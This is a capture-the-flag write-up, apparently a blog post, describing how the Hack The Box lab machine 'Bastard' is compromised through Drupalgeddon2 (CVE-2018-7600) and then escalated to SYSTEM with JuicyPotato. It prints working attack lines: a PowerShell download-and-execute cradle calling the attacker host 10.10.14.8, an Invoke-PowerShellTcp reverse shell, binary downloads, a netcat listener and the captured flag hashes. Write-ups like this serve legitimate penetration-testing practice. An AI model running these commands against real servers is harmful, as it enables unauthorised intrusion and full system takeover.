IP: 10.10.10.9
S.O: Windows
Drupal / SeImpersonatePrivilege
Introduction
We will take advantage of a RCE in drupal to get a reverse shell.
Once in the system, we will escalate priviledge with SeImpersonatePrivilege
Enumeration
nmap -p- --open -sS --min-rate 5000 -v -sC -sV -n 10.10.10.9 -oN bastand.nmap
80/tcp open http Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to 10.10.10.9 | 10.10.10.9], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET]
Whatweb reveals two important things, our victimm is a windows, and the system is running a Drupal 7 which is vulnerable to a highly critical vulnerability drupalgeddeon. CVE-2018-7600.
The vulnerability can enable remote code execution and results from insufficient input validation on the Drupal 7 Form API
More info: https://unit42.paloaltonetworks.com/unit42-exploit-wild-drupalgeddon2-analysis-cve-2018-7600/
Let's check the version:
curl -s http://10.10.10.9/CHANGELOG.txt | head
Drupal 7.54,
Now let's see what exploits we can use:
searchsploit drupal 7.54
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
We can use Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Foothold
if we have a look at 44449.rb
Just we need to do some modification in the exploit in order to get a reverse shell from Windows:
# Final command to execute
# cmd = "#{bashcmd} | tee #{webshellpath}"
cmd = "powershell -c IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.8/drupal.ps1')"
drupal.ps1 it is a copy of Invoke-PowerShell modified just to get the reverse shell
We added this end line to drupal.ps1:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 443
Then we execute the exploit:
ruby 44449.rb http://10.10.10.9
We run our http server to upload the drupal.ps1 script which will execute a reverse shell against our attacker machine
python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [30/Jan/2022 17:15:54] "GET /drupal.ps1 HTTP/1.1" 200 -
Here we will get the reverse shell:
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49493
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
Priviledge Escalation
PS C:\windows\temp\temp> whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
PS C:\windows\temp\temp>
We will use JuicyPotato technique to escalate our priviledges:
we upload the binary:
(new-object net.webclient).downloadfile('http://10.10.14.8/JuicyPotato.exe', 'C:\windows\temp\jp.exe')
and the command we will execute:
(new-object net.webclient).downloadfile('http://10.10.14.8/rv.bat', 'C:\windows\temp\rv.bat')
rv.bat contains:
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8/Invoke-PowerShellTcp.ps1')
./jp.exe -l 1337 -t * -p C:\windows\temp\temp\rv.bat -c “{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}”
root@kali:/home/alter# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49499
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> cd
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 19/3/2017 7:34 ?? 32 root.txt.txt
PS C:\Users\Administrator\Desktop> type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c
PS C:\Users\dimitris\Desktop> dir
Directory: C:\Users\dimitris\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 19/3/2017 8:06 ?? 32 user.txt
PS C:\Users\dimitris\Desktop> type user.txt
ba22fde1932d06eb76a163d312f921a2
No hay comentarios:
Publicar un comentario